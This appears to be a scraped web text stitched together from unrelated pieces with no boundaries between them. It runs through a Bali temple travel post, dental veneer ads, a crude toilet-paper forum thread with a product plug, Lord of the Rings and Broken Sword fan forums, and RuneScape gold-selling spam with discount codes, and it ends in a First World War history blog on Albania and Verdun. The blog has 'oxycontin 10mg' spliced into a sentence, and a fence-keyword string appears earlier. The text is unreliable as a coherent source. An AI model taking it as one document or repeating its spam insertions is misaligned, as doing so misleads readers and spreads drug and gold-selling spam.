My first port of call was exploring the local area and reading up on Balinese traditions and customs. I walked around the neighbourhood, completely in awe of how ornate and decorative people’s gates, gardens and shrines were. I visited a few of the local temples around Seminyak, wrapped up in the mandatory sarong. These are worth a visit, because while every other cultural traveller is hitting the clubs, surf spots or the big tourist sites like Tanah Lot and Pura Luhur Uluwatu, the less famous local gems remain empty and totally tourist-free. Not only did I get to explore Pura Petitenget in total peace and solitude, and without being hassled by the local sellers (which happens a lot at the more famous sites), I got areal feel of the place and got to watch some of the ceremonies and rituals that went on as regular people came to worship there.
So, my top tip is to skip the top 10 temples on every Bali travel list and go for the lesser known ones. The architecture is still just as magnificent, but you will most likely get to enjoy it in private. If you are stuck for ideas, search for “pura” (Balinese word for temple) and your local area in Google maps. You will get a bunch of results popping up. Go, explore, and if it turns out to be your thing, try visiting some of the further-away sites. And to wrap up your time in Kuta, Seminyak and Legian, take a walk at sunset down Kuta beach. The sky, sea and sand light up in shades of red and pink.
Our experienced and compassionate team will offer you and your family the personalized care and attention you deserve to ensure a healthy, confident smile that will last you a lifetime.
If you ever hide your smile because you're unhappy with your teeth, consider our cosmetic smile solutions.
Invisalign® provides a straight, healthy smile that helps your boost self-esteem, self-confidence, and self-image.
Porcelain dental veneers are a type of cosmetic dental solution. Veneers are thin, durable, tooth-colored “shells.” After being custom-fabricated, they are bonded onto the front of your tooth. Veneers look natural and beautiful for an immediate improvement in the appearance of your smile.
Veneers may be ideal if your teeth are healthy, but stained, gapped, crooked, or chipped. Porcelain veneers can make teeth look:
Porcelain veneers can last for years with proper care. Continue brushing, flossing, and regular professional cleanings and exams.
lowes wooden fence panels fencing wood fence wooden fence wood fence panels wood fence panels fences unique privacy fences wooden fence panels for sale lowes.
Tsipras: Look, it's not about philanthropy for Greece. It's about joint responsibility and European solidarity. If Greece can't service its debt, that also has an effect on our partners. As such, a safety net for Greece is necessary and we also have to return to the capital markets as rapidly as possible. But that can't be combined with a program that has led to a situation of social distress; we need one that brings growth.
Illustrator and writer, by nature the former and by circumstance the latter. Grew up in the bush and moved to the city, traipsed around the east coast, fell in love, read Cormac McCarthy, listened to Townes Van Zandt and picked up a banjo.
I’m interested in the balance of things, of things as they really are — neither here nor there, beautiful or horrible, strong or weak, wise or stupid. And in no way mundane.
Charmin with Aloe should come with a small vacuum to help gather up the snow fairies that are hiding in crevices after use. I am tired of gathering them up or finding them later.
Recession happened. No one can afford expensive TP so they had to cut quality to keep it affordable. Or they are just cheap bastards. Either way, the days of quality over quantity are long gone. Any cut to save a buck.
The proper order is kiss me, then go smell the other dog or cat's butt. I cannot stress this enough.
"One of the founding members of the Front Page Hyena Pack, and runs as its alpha male when the urge strikes him, which is often." Daphne (one perceptive chick)
Chief, let me know when your ready for corn cobs I bet I could ship you some.Do you prefer white or red cobs? The best way to do it is use 2 red ones and then a white one to see if you need another red one,but you devise your own method that works for you.
LP....The color doesn't really matter as I have discovered the best method is simply to sniff the cob between applications. I used to try to use less cobs by using both ends but discovered that the extra soap required for hand washing negated any savings in cob volume.
Charmin with Aloe is supposed to be asswipe? Heck, I've been using it to repair the stucco on my house.
Talk about a coincidence....I have been wiping my ass with the stucco chunks that fall from my ceiling!!
Oh NO! Really? My friends used to rave about this stuff. I've always hated 'lint-y' TP - and they said the virtue of the aloe stuff was soft, lint-free wiping. No TP pills in yr underwear. I had yet to try it, and now I hear this? Figures! By the time I get around to something good, it starts to suck... ; (
Just go over to other people's house to shit. When you are done wipe with their bathmats. Best to make a hasty exit afterwards though.
Stick with cheap paper; it's already cut-rate, so they don't have to cut corners. Marcal, Scott's, etc. Never leaves dandruff. Not luxury, but a friend in necessity.
Scott original has been the same all of my life. I like scott because it leaves me dust free in the nostril also.
The only problem I have with Scott is when I have the liqishits. After the 7th or 8th trip to the pot to squirt my ass feels like I'm wiping with sandpaper.
Me too. However, I tealized that I wiped to hard. If I am gentle yet thorough, my bottom doesn't get as irritated but the roid swells up no matter how gentle I am. I also wipe my eyes with scott after I administer my eye drops twice a day. It never lets me down.
Usually, the ass gets its wipe first. The nose second and the eyes last. I don't use the same squares, PD and I wash my hands in between body parts. It cannot be the other way around as my poop calls me up before I am awake. So first come first serve. After I poop a few times, if it is time to get up, I wash my face, brush my teeth, put hyalira and cerave on my face, put systane in the eyes, do cat bath wipe on pits and privates, take my meds, get dressed, put blush and lipstick on, feed the Boola, get my water then leave for work at approximately 0545. I take my bath at night because I would have to get up at 0430 to bathe in the morning. br>_______
Laughing out loud again, Misses C. No, I don't lick my pits, LOL. i wipe them with a fresh baby wipe or a cerave laden washcloth. I like the baby wipe better because it is easy and fayest.
I love baby wipes. I have OCD about things being clean and I carry baby wipes everywhere. You never know when you're going to need to remove fingerprints from a crime scene.
Laughing out loud again, Misses C. as you are on a roll! Me too, I have some in my car along with a roll of TP. Wait, I used to have TP in my car. I haven't seen it lately so I must have used it.
I prefer to "borrow" a large handful of napkins from resturants when I go out. Never have to buy napkins again.
I hate when we go get ice cream and they don't offer napkins. Hello I have 4 kids I might as well just throw this ice cream all over my van right now if your stupid ass isn't going to give me some napkins bitch.
Well, I ask if its a drive through, if I think about it, but at the snowball stand I take a bunch. They come in handy when I sneeze all over the steering wheel. At least its just sneeze. When I worked home health, I would get a sudden onset of nausea and vomit in a bag if not out the door, although I have spewed vomit all over the front seat of my prekatrina car. Since I don't drive for living anymore, I don't get as nauseated during the day. Go figure, I got car sick while driving my own car!br>_______
The best sneezes are fom small children who have a mouth full of cookies. It's great to see a chocolate chip traveling at 80 mph hit the inside of your windsheild.
Laughing out loud at you again, Misses. I would say a chocochip sneeze iss the best too. Kids sneezes are often ridden with thick flying mucus, yuck.
i'm going out on a limb here but i think trying toilet paper that has aloe or anytime of lotion-esque application within is a bad idea both to invent and to partake in using on one's asscrack. tissues is one thing but dang...
I have very dry skin and lack of estrogen makes it unbearable. However, since I have been bathing with Cerave, I'm not experiencing as much trauma to my precious privates. My face doesnt hurt as bad anymore either. I have had to put lotion on my starkiss befor and well...I don;t like the slidey moisty feeling in my crack.
charmin always sucks. you want know why? well, because charmin is too suck. it always falls apart when you are trying to wipe the butt.
I still find Scott or Marcal tissue quite easy and painless to use; on the rare occasions when my poop is too sticky to wipe away easily, I use a baby wipe after the t.p. wipe, and then I put a little hygienic cleansing lotion (Balneol or equivalent) on some t.p. and rub it in on the anus; it feels good.
Nooooo Charmin sucks because those god damned bears are always flaunting their dingleberry filled asses all over my tv screen.
I have been watching my cat closely and trying to master the art of eliminating TP by licking my asshole. My cat always has a pleased look on its face while performing the act so it may just be the way to go.
If you like your current choice of toilet paper, check out the other thread now up, "If Big Brother started watching." You may, or may not, be permitted to continue using your personal choice. . . .
Wow, how refreshing, and ironic, people with at least half a brain making me pee and poop my pants laughing so early in the morning, over a subject that is so rife with fecundity!
I have to most horrible shitpaper on earth, it gets caught in my vagina and creates spitballs later.
I do agree, it's hard to find a roll of TP that won't put snow on your dingleberries. However I've found it happening enough to me, that I had ended up forking over a good bit of money for TP, I've honestly considered stealing TP from an expensive hotels public bathroom(Because they always have the nice stuff), the only issue is smuggling it all out, you can't carry them out in a coat, and just taking the TP from 3 or 4 stalls might not be worth it, unless you get those odd double roll things(then you may get 4 or 8 rolls as opposed to one to each stall and call it quits, but those are usually in fast food restruants here) by the time you get enough they'll probably catch on, and you'll have to haul ass and hope you can chase public transportation or race to the 4th floor of the parking garage without losing the TP.
AC.....There are enough wholesale stores in the USA that there is no need to become a thief. Go to Sam's Club and you can get industrial size packs of very serviceable paper at a reasonable price. If you follow through on your thievery plan I hope you end up with fiberglass infused ass-wipe.
I hate when that happens. I've picked up a few other brands where the same ass-dandruff occurs. That's why I always try to finish up with a one of those wet-wipes. Those usually pick up any small pieces stuff in crevices or ass hairs.
I'm wearing glasses to read the comments, and laughing enough at them to have tears run down my lenses. Wipe again...
All the TP talk is something I am very familiar with as CEO, of sorts, to www.MB3products.com, (yes, a shameless plug)
We have a lotion product, called MB3 Personal Hygiene, that is applied to toilet paper for the final wipe, or two if needed, after release of the beast...
Your dingle berries issues will be a thing of the past, and our formula does not disintegrate the toilet paper on contact, such as water, spit, foams and sprays will do.
We've eliminated some of the harsher chemicals found in competing products, added some cocoa butter to help tame your exit wound if you're a chili eater, and pH balanced it!
It works very well, and we'd appreciatre your checking it out on our website, which I can almost guarantee you'll enjoy reading anyway.
It is possible to get over 100 applications from this product size, therefore pretty economical and convenient to use.
A similar thing happened at on The Urinal Poop Scandal: Confessions Of A Turd Terrorist by Anonymous
Good Post...Thanks for on Terrible Real Estate Agent Photograph and Toilets: An Unbeatable Combination by Anonymous
@obox You guys ever get compliments or complaints about your colour variations? Wondering if they're actually *that* useful. about 3 hours ago
PoopReport.com is a community with a unique agenda: we are an intellectual poop site. A salon. A brokerage house that specializes in a specific category of humor: brown humor (vs. gallows humor or black humor). We explore, even meditate upon the human condition from the vantage point of pooping and poop. In a way, this is a site for philosophers, sociologists and amateur theologians.
Sometimes we talk about sex, but there's no erotic agenda. (There are other sites for that.) Because PR is a community and not a porno site, we do not come here to get our rocks off. And that also means we don't come to PR to be used as objects by voyeurs, or use others as objects. Voyeurism destroys mutuality. PoopReport.com is rooted in mutuality because it celebrates the universality of poop.
This 8" x 10" black and white photo has been signed by Jimmy Cagney in black felt tip pen. This photo is a scene from the 1932 film "The Crowd Roars". Cagney is pictured here with Ann Dvorak, one of the co-stars.The photo shows minor wear, but is in overall very good shape. This is from the estate of Dan (Oberholtz) Diamond, a prominent Kansas City area DJ for decades. Besides his many years as a DJ and interviewing most of the top musical acts of his time, Dan was also known for his vast personal record collection.
It is indeed done. We realised some technical and content-based issues. I can't tell you when those will be fixed.
So, the English voices are done and are ready, or the problems are fixed and it is nearly ready etc.?
The voices are nearly ready. We still need to resolve the technical issues that Tooms has mentioned and also put some finishing touches on the current audio files.
So, finishing touches as in a few months (like it has been after the previous announcements) or a matter of days? Just curious ;)
Well, I can assure you that it's not a matter of months anymore (unless we run into some more technical problems).
I'm downloading the game right now, after a nostalgia attack that drove me to play the first 2 broken sword games... I'm not quite ready (nor is my old laptop) to play the 3rd game. I only found out about this fan-made version this week and I've read your website top to bottom... all I can say is thanks a lot! Talk about hardcore fans, indeed the game looks quite good and loyal to the quality of the first 2.
Since I'm not very patient, I think I'll play the game with the subtitles (English and Portuguese - for the chuckle :P) but I'm posting this mainly to get updates on the release of the English voice pack. You know, just in case it does come out soon.
it blew my mind how good it was. Very few factors made it distinguishable from the real thing (meaning, a Revolution Software game). Ten minutes into the game and the fact that the voices were in German didn't faze me anymore... reminded me of when I originally played Monkey Island 1 in Spanish :P
Story and dialogue are almost flawless (only a few minor factual incongruities, but to few to mention :P), the music is spot-on, same goes for the graphics and gameplay, minus the missing cutscenes in which we have to use the sound to fill the gaps, still this is not a complaint. The main cutscene at the end makes it all worthwhile :D
Furthermore, the lovely (if short) epilogue was in fact better than Revolution did in either of this game's official predecessors (both even shorter).
I absolutely loved it guys (and girls, obviously)! Thanks for all the commitment and hard work. I did read the credits to the end, so I have a pretty good idea of the herculean organisational endeavour that this must have required - and all without the help of Revolution! I wonder what they think of the game :D
P.S.: What do I do with my win code, by the way? I see that bonus.brokensword25.com no longer exists :P
chas wrote: P.S.: What do I do with my win code, by the way? I see that bonus.brokensword25.com no longer exists :P
Whoops, only saw this now Chas. Thanks, man... I'm downloading it again now that the English audio is ready. Hope you're enjoying it finally :)
I think you could have done much better for George - he sounds so bored and dull as if he is about to fall asleep.
Seriously though WOW, you guys did a great job with this, i just can not believe this is a FAN-MADE game.
Oh, and i thought the voice acting was just fine, your never going to get it to sound exactly like the original actors but you did a bloody good job there too!
What's the most embarrasing LOTR related thing that ever happend to you? - The Barrow-Downs Discussion Forum
I was wondering if any of you had an embarrassing thing LOTR related ever happen to you. Believe me... I have.
My mother and I were running errands one day and we passed this guy sitting on a fence post. He had long blond hair (slightly wavy though) pulled back and was fiddling with a guitar. My mom said "Hey look! There's Legolas!" I was like. "Not quite." And then as we were driving away she began to tease me saying. "Oh Legolas! I finally found you! You and your beautiful flaxen hair!"
Needless to say.... the guy did NOT look like Legolas and I got kind of irritated. not quite Legolas if ya know what I mean.....
The other time was when my little sister accused me of having a crush on Legolas. (Sure... not that far off the mark, but there's not need for her to know that.) [img]smilies/wink.gif[/img]
I've had too many to count, but most of them happen when I start reciting LotR lines out of place [img]smilies/tongue.gif[/img]
Mom's entire "Boromir is a horse's rear!" stint was slightly embarrassing, but we laugh now. I can't think of anything else at the moment.
Although, I reckon, the time when I had spent ages *****ing about Arwen, was riding a white horse, which was spooked by a black one...and I fell off o.O Oh well...it was funny at the time...
A lot of embarrassing things have happened to me when I have been thinking about LotR instead of doing something else that I should've been doing...like in my French lesson today, I was thinking about how the RotK movie might finish and suddenly I heard my name being spoken, and Mr French blokey-guy asked me a question in French and I just translated it instead of answering it....ok, you don't wanna hear about my sad life any more!!!
Welll...nothing really. I got stared at for writing in Runes which made me uncomfortable but thats it.
I don't think anything embarrassing has ever happened to me... I don't get embarrassed if I'm in the street yelling lines from Lotr and pretending to defeat balrogs and get funny looks from passers-by.
My mum embarrasses me by dancing and singing to the music they play before the films start in the cinema. We were seeing Lotr on one occasion, so I guess that could count.
'The Hobbit' 1st impressions: 1. Thorin is hot... Oh god, I fancy a dwarf. 2. Thranduil is hotter. 3. Is that... Figwit! 4. Does Elijah Wood never age?
I said to my teacher that Gollum ate my homework. She was not pleased. I don't even have a goll.. eh dog.
Actually, I think I may have once woken up after dreaming about fighting orcs, and sometimes you wake up at the point where you're talking in the dream, and you finish the sentence out loud. I may have done that and woke up mumbling something like, "Slaughter those orcs, Aragorn!" I get pretty embarrassed in case someone hears me from the next room.
I've done that. That, and scribbling Tengwar all over the board has not earned me great favor with my English teacher. o.O
and scribbling Tengwar all over the board has not earned me great favor with my English teacher. o.O
Actualy I did not do that. I did write that my teacher was a stupid ***** on the blackboard. Does that count?
hmm nothing really embarrasing happens.. though, I have scribbled all over the white board in elvish! I've also written 'FRODO LIVES' in giant bubble letters across the board.. I got a lot of stares.. [img]smilies/biggrin.gif[/img] [img]smilies/biggrin.gif[/img] [img]smilies/biggrin.gif[/img]
In orchestra i wrote "do the wave for boromir the disco king accrost the board" and in english class we were all told to bring in poems to read to the class so i decided to recite the lament for boromir, useing diffrent voices for gimli legolas and aragorn...
I actually quoted somebody's signature (sorry, somebody) and wrote on the board "Frodo most certainly does live!" [img]smilies/biggrin.gif[/img] [img]smilies/tongue.gif[/img]
One day when i wasnt listening in Geography, my teacher asked me a questions about what land mark was in the north east of some country, i have no idea what it was, but i looked up from my desk and answered automatically.."grey havens" My teacher looked at me strange, but he makes allownaces for my insanity..
"Athena, stepping up behind him, visible to no one but Achillies, gripped his red-gold hair. Startled he made a half turn, and he knew her upon the instant for Athena." ~The Iliad~
Friday in class we were reading about some place called "Moriah", so the moment we got to it, totally automatically, me and 3 guys (not 3 guys and I [img]smilies/wink.gif[/img]) said at the same time: "Moria!" And then we all turned red as the class stared at us going "what?" [img]smilies/rolleyes.gif[/img] Ignorant mortals.
I had that one to. Moriah is a mountain in the story of Abraham.(I believe, the story when this guy has to sacrafize his son). He goes up to the mountain Moriah. Well a guy said that and I suddenly prompetd: Watch out for the watcher. Most of the kids got it. The teacher did not. He is the one where I wrote down he was a stupid *****.
Oh! Thats exactly what we were studing! The biblical story thing... but when we popped off with "Moria", everybody looked so clueless, it wasn't even funny. But my friend ot the gist of it pretty quick and gave ma quick punch on the back. Luckily, she doesn't know how to do it so it hurts... MUAHAHAHAHA [img]smilies/evil.gif[/img] [img]smilies/wink.gif[/img]
Lol, but sorry, your help is not needed just now [img]smilies/wink.gif[/img] . If I really wanted to I could teach her myself, but what would she use it for excpet punching me? WHere's the logic there? [img]smilies/tongue.gif[/img]
On topic- I was outside at 3am today with my mom and I ran down the street whispering Nazgul! in my loudest whisper. Pathetic, isn't it?
Okay to begin with, I have low blood sugar and whenever I haven't eaten in while and I am getting pretty hungry, I have always had a tendency to get kind of strange and I'm afaid adding LOTR behaviour to this hasn't work very well.
The embarrassing thing is that now when it happens, my sister or a few of my friends are able to recognize the behavior before it gets very far. All I have to do is be a little obnoxious, start wispering about my precious, or showing my teeth a teeny tiny bit and they start saying things like "stop being Gollum, Tinuviel(my mother has this thing about writing my real name on the internet)" or "you are NOT an Uruk-hai, quit baring your fangs"
"Is it possible Disdain should die while she hath such meet food to feed it, as Signore Benedick? Courtecy itself must convert to Disdain if you come in her presence"
I got a good one yesterday. In my religion class we were talking about king Solomon, and I, as usual, was only half paying attention, so when my teacher mentioned his name I looked up and said, "Don't you mean Saruman?" Everyone looked at me like I had absolutely lost my mind.
Once my sister & I were singing about Gimli. The words were 'burning Gimli'but by mistake we said 'doing Gimli.' No one was around but it was still embarrasing.
O show me the way to go home! I'm tired & I wanna go to bed. I had a little drink about an hour ago & it's gotten right to my head. Wherever I may roam: by land, or sea, or foam, you can find me hear just singin' this song! Show me the way to go home!
Well, whenever I mean to say "habit" I saw Hobbit, or it just comes out all weird (like hoo-habit). [img]smilies/wink.gif[/img] Um, what else? Oh yeah...Halloween 2002. I found an Arwen costume at the costume shop, so I decided I'd go as an elf. I was walking down my 6th grade teacher's driveway when I tripped flat onto my face. Oh the horror! [img]smilies/redface.gif[/img]
once I wrote on the bottom of my SOS exam in elvish (language and Tengwar) something about my Teacher smelling as bad as an Orc (you can just tell I had been looking at the Insults in Elvish thread that morning), He asked me what language it was, I said Quenya, and He said...Are you part Quenyan then??? Needless to say,I fell off the chair laughing.
Then another Time (the almighty car-crash joke) some-one said that 'that Tolkien dude died in a carcrash last night'.
AND if anyone else is interested, I Started cracking up laughing in ICT today while reading alliwantisanelfforchristmas(AKA al)'s stories. That one was detention worthy...
We ahve mini tablet PC's in class (We're testing them for the year 7's) ANd they have the inet on. So needless to say I spend the whole lesson on the net... (Like now!) I always have to be carful when reading amuzing things in case of giving the game away. Also yesterday in church we were making little cards for people who had come over from over countres to do something... and I accidently sighed one in elvish... The boys who were sitting at my table took one look at my writing and hair and started yelling at their top of their voices: "SHE'S AN ELf!" As I am a hobbit I was NOT amuzed and as there was a seriously fit guy on the table it was even worse. And went we left they kept tryingt to check if my ears were pointed. It was so embarasing... [img]smilies/mad.gif[/img]
That's just cool! I wish I could get people staring for that sort of stuff, instead of just my behavior... [img]smilies/rolleyes.gif[/img]
Anyways, I would say everytime I accidently quote someone. One day I just felt like imitating Gollum (the "We be nice to them, if they be nice to us" one) and so I did. Never mind I did it in class... And people just keep looking weird when I ask my ring for something. The first two days I wondered (so yeah, I blushed a bit [img]smilies/redface.gif[/img] ) but now I'm just proud of being special. [img]smilies/tongue.gif[/img]
My Graphic design teacher always calls me 'elf-kin' and i have no idea why...probably got something to do with the fact i'm in the room every lunch time looking at LOTR stuff on the internet [img]smilies/smile.gif[/img]
Also, one time, we were in music and me and my friend (who also happens to be an LOTR fan) were given some question sheets, the teacher told us to put our names on them and we bother put our elvish names on them, at the end of the lesson he said 'i want to speak to Tanhilwen and Rinfennas after the lesson' he had no idea it was us but needless to say he wasnt too pleased as it was some sort of quiz we had to do. &gt;.&lt;
«And it is true that taxpayers in Germany and across the eurozone would — unfairly — lose out if Greece obtained the debt relief it needs to recover. But why is that? Because Merkel violated the no-bailout rule in the first place, putting the interests of German banks ahead of those of European citizens — including Germans — and setting Europeans against each other. If only German voters realized that Merkel and Schäuble have lied to them and sold them out, they wouldn’t fall into the nationalist trap of blaming the Greeks for their own banks’ and government’s misdeeds!»
Chillingham is quite possibly my favourite place in the North East, though I doubt you and I have seen it in the same light. The majority will see it in it’s hazy summer glory, for this is when holidays are taken and Chillingham gets to recoup some of the cost of its spectacular renovation: the gory tales and tours are family friendly (well, for the Adams Family at least), and Sir Humpty’s collection of gore-abilia will rightly pull in the crowds.
But for me, Chillingham Castle is at its best when the estate is partially closed for the Autumn and Winter (except to people staying the night), for there is usually a tradesman’s entrance available for dog walkers, nosy folk and stray photographers (seek and ye shall find).
But shhh… don’t tell Sir Humpty, or next time I go soaking up the silence in the deserted castle grounds, I might put me on the rack.
Cabinet Bohdanowicz is an auditing and accounting firm. Its services include acquisition audits, accounts consolidation, evaluation of internal control, report management, as well as verification of annual accounts and fiscal declarations. Additionally, the firm facilitates online auditing services. Cabinet Bohdanowicz is based in Paris, France.
Return to port Sarim. Go west and gamers will see food shop. Talk with Wydin with runescape 2007 gold your white apron. This can get from varrock clothes shop. Enter storage and look for a job. Many boxes in storage and one of them have bananas. Search the crate and gamers will get Karamjan rum.
Rsorder is Trusted Runescape gold Site 2018 to Buy All RS products 24/7 online. It owns 9 years of experience in the gaming market and Millons of players from Europe, Asia, South America and so on.Now The new version of RSorder is live, you can buy All RS products with mobile conveniently and quickly!
5% more gold code:RSYK5 for all rs products & 10% accounts code:OSRSA10 for all rs accounts anytime!
In an interview, former Jagex CEO Geoff Iddison stated that do plan to go East with it [RuneScape] to the Asian market and the Eastern European market too and is not for Japan, but it could work well in Malaysia for example. And where India in all this? I think RuneScape is a game that would be adopted in the English speaking Indian world and the local speaking Indian world. After the tutorial,
players have access to tutors located in the towns they explore. These non player characters, or NPCs, can replace some basic equipment items if necessary and can give players appropriate information about their respective skills. When the tutorial was initially introduced on 24 September 2002, it was set on a secluded island.[38] On 14 July 2008, a new tutorial was briefly introduced, set in the town of Lumbridge.[39] However, due to technical difficulties with the new one, the original tutorial was temporarily reinstated.[30]
It is also possible to build a website where you allow people to play the game free of charge. This could allow you to build a gaming community where you can earn income from advertising. There are no limits to the types of free online games you can produce on the internet. The only thing that limits you is your imagination.
At this point it is important to realize there are 3 other aspects that must be successfully addressed for the site to gain and retain readers!
Hi!Time to Save Up to 7% cost on OSRS Gold&RuneScape gold with code RSC7 for the Boss:RuneScape Solak Until May 23!Snap by http://www.rsorder.com/ in time!
Part II:All Kinds of rs 07 gold/rs3 gold and osrs accounts with only $1 is also waitting for you on RSorder Auction at 03:00 am. GMT each Monday and Thurday!Win from https://www.rsorder.com/auction.
LinkedIn is awful. I should have deleted it from my phone when I found a job after an extended search a few months ago.
@petebrown anything special or just the usual avalanche of emails (haven’t had the app installed for years)?
March 1, 2018 - February 28, 2019 @ Various coffee shops across Kansas City; see passport for locations!
Savor the sips across the metro by drinking coffee, collecting stickers and completing your passport! Become a coffee ninja today and earn a cool coffee tumbler---visit www.kcdestinations.com to learn more! #KCCoffeeTrip
We've noticed you're currently running ad blocking software. The contents of this site are available for free thanks to the contributions of our sponsors. If you cannot see the entire article, we would appreciate if you would deactivate your ad blocker and refresh the page before continuing to browse.
Writer and sassy ginger currently residing in central Pennsylvania. Matt spends most of his free time online shopping for clothing that he doesn't need, perfecting the art of eye-rolling, and indulging in all forms of pop culture.
But what professional rafter Covey Baack did during a recent rafting excursion in Gold Hills, Oregon, makes even the most intense rafters' stunts look like nothing. Baack went ahead and stacked six rafts on top of each other. It looked like he was just doing that to move them, but then he pulled up to the water.
Baack’s contraption looks like it could easily topple into the water with just the smallest bump or jolt.
Nationalism can be very bad for the hindsight. In Britain, for instance, there are individuals, national newspapers and political organisations inclined to the view that no people suffered the burdens of twentieth-century global madness more completely than the British. In fact, despite the heavy casualties, bombing raids and social disruptions of two world wars, the British had a relatively easy twentieth century by European standards.
Before you get outraged on behalf of your ancestors and report me to the Heritage Denial authorities, think about where in Europe you’d rather have been. Once you eliminate all those countries invaded, occupied, blighted by dictatorship, scarred by revolution, slaughtered, wiped out or all of the above, you’re left with Sweden, Switzerland and maybe Iceland – and if that’s not enough to convince you, try taking a look at those European countries dealt really bad hands.
Poland springs instantly to mind – invaded, ravaged, partitioned and oppressed over and over again – but the same could be said of many other nations, especially those on the frontiers of ambitious empires or would-be empires. Albania is one of those nations, and the context surrounding events on 27 February 1916, when Austro-Hungarian forces captured the Adriatic port of Durazzo (now called Durrës), gives me an excuse to sketch out the early years of one European country’s rotten twentieth century.
Part of the southern Balkans, nestling between mountains and the Adriatic coast, Albania reached the twentieth century as an ethnically mixed, essentially tribal society, governed as a province of the Ottoman Empire. Like many of the more far-flung territories nominally ruled by the Sultan in Constantinople, it was basically autonomous, and in July 1913, after Turkey’s defeat in the Second Balkan War, it was given formal status as an autonomous principality. Sounds good, but removal of the theoretical protection offered by Ottoman ownership left Albania’s expansionist neighbours free to include it in the territorial carve-up surrounding the Balkan Wars.
I put together some background to the mysteries of the Balkan Wars in a previous post (6 September, 1915: Caveat Emptor), but from an Albanian perspective they left Greece, Serbia and Italy ready and anxious to control some or all of the country. While Italian influence dominated the ‘independent’ centre of the country, Greek incursions to the south and Serbian to the north meant that three separate Albanian governments were claiming international recognition by early 1914. Europe’s great powers, united in exasperation at the dangerous chaos of Balkan politics, responded with the old-school expedient of appointing a monarch to sort out the mess.
Prince Wilhelm of Wied, a German princeling with strong links to Vienna, took the throne in March 1914. He sought a semblance of legitimacy by appointing Essad Pasha, the region’s last Ottoman governor and its only internationally recognised authority, as his war minister – but Essad made his own bid for power almost immediately, and was gaining some measure of control over Albania’s largely lawless central region when the outbreak of general war in Europe moved the goalposts in his favour. Prince Wilhelm’s brief flirtation with international significance ended when he fled the country in September, and for the next year Albania remained divided, with Serbian and Greek armies of occupation remaining static in the regions to the north and south of Essad’s central fiefdom.
This unhealthy balance was upset by the Central Powers’ invasion of Serbia in the autumn of 1915, which ended Serbian occupation of the north but also put Austro-Hungarian forces in what passed for control of central Albania by the end of the year, forcing Essad’s flight to Salonika. The Italian Navy had meanwhile captured the Albanian port of Valona (Vlorë) as part of the operation to evacuate the retreating remnant of Serbia’s army to Corfu, but though Italian warships bombarded Durazzo and set parts of the town ablaze, no serious attempt was made to prevent the port’s capture. Remaining in Austro-Hungarian hands , it formed part of the Adriatic naval front line until late 1918.
Albania spent the rest of the War in a state of chaos. While Austro-Hungarian authorities struggled in vain the control the northern, central and coastal regions, the Bulgarian Army took over part of eastern Albania until 1917. The Greeks, chronically unable to decide which side of the War they were on, withdrew from southern Albania in the autumn of 1916, but were replaced by Italian and a few French troops. Though a major burden on Albania’s primitive economy, these occupying forces were little more than targets for the local warlords who actually controlled most of the country, and who were generally happy to take money from one side to undertake guerilla activities against another. Here a map, stolen of course and removable on demand, of Albania’s theoretical divisions in late 1916.
Green for Italian, pink for French, muddy green for Austria-Hungary… and this map ignores the Bulgarians to the northeast.
No credible political authority had emerged in Albania by the time a collapsing Austria-Hungary withdrew from the Balkans in September 1918, and Italian forces remained to occupy the country after the Armistice. Now the sole targets for guerilla attacks (by warlords, independence fighters or bandits, depending on your viewpoint), the Italians quit the country in 1920, and later that year local warlords fought off an attack through the northern mountains by forces from the newly formed Kingdom of Serbs, Croats and Slovenes (later known as Yugoslavia). Albania’s existence as an independent nation was finally settled in 1921, with Italian, Greek and Yugoslav agreement to appoint a ‘regency council’ as its governing body, but a century of troubles had barely begun.
Factional struggles amounting to clan warfare prevented even a modicum of political stability during the 1920s, and to cut a long story short Albania went through serial regime changes before becoming a republic, a monarchy under King Zog, a possession of Mussolini’s Italy, a Nazi-occupied state and, for almost fifty years from 1944, a Communist state under the truly bizarre dictatorship of Enver Hoxha. These days Albania is trying to join the EU, and anyone who thinks the country doesn’t deserve peaceful integration with the rest of Europe has been reading the wrong newspapers, but internal factionalism, widespread corruption and communal division remain serious obstacles to progress, and the Balkans are still a very volatile place oxycontin 10mg.
So the First World War was tough on every European participant, Britain included, but for Albanians it was terrible every day, a story of danger and deprivation for all, and a mere chapter in the chronicle of more or less violent oppression that was to be their lot for the rest of the century. Just thought you should know…
What was the First World War’s defining event? It’s a tricky question, and it invites a variety of answers in almost every country involved.
For relatively small countries embroiled in the conflict, along with colonies drawn in by imperial ties and the newly independent nations born from the ruins of wartime empires, the answer might be one of the great battles or might be a matter of strictly national perspective. In Serbia, for instance, the Great Retreat of late 1915 stands as an emblem for national survival, while Australians and New Zealanders look to Gallipoli as the birthplace of modern national identity.
For most of the great empires at war, an answer is even more difficult to pin down. For most inhabitants of the Russian, German, Austro-Hungarian or Ottoman Empires, the War was probably defined by the collapse that ended it rather than any event within it, and you can argue that entering the War was its defining moment for the United States.
That leaves Britain and France, the two great European empires that survived the struggle from start to finish and might be said to enjoy an uninterrupted historical view. If you’re British, eyes permanently fixed on the nearest and most costly theatre, the Western Front, the Somme or Ypres is probably the name that defines the War in all its ghastliness, but it’s still a matter of opinion and the title’s still up for grabs. If you’re French, there’s no argument. For France, the event that defines the First World War was the German attack on Verdun, and it began a hundred years ago today.
I shouldn’t have to give you the basic facts about this particular centenary, but the British heritage industry isn’t paying much attention to Verdun, partly because the First World War went off the radar and is back to being subsumed by the Second, partly because the British weren’t involved. So at the risk of boring anyone well informed or French, here’s the deal.
The battle for Verdun was fought from 21 February until 18 December 1916. It was the longest battle of the War and the most costly in terms of casualties. Verdun was a fortified garrison town on the River Meuse, some 200km east of Paris, surrounded by rings of forts and considered the strongest defensive position in France. An important strategic point for French defence during the Revolutionary Wars of the 1790s and the war against Prussia in 1870, the Verdun fortress network was seen by French strategists, politicians and public as the key – or at least the symbolic key – to national security against threats from the east.
Since 1914 the fortified area around Verdun had jutted into German lines as a bulge, or salient, and was an obvious target for a limited German offensive. Despite a growing consensus among French field commanders that defending fortresses was an anachronistic waste of resources, it was considered vital to popular morale by military and political leaders constantly afraid that a traditionally turbulent public would succumb to pacifism or rebellion. So why did the German high command pick on such a tough nut as the target for its big spring offensive on the Western Front?
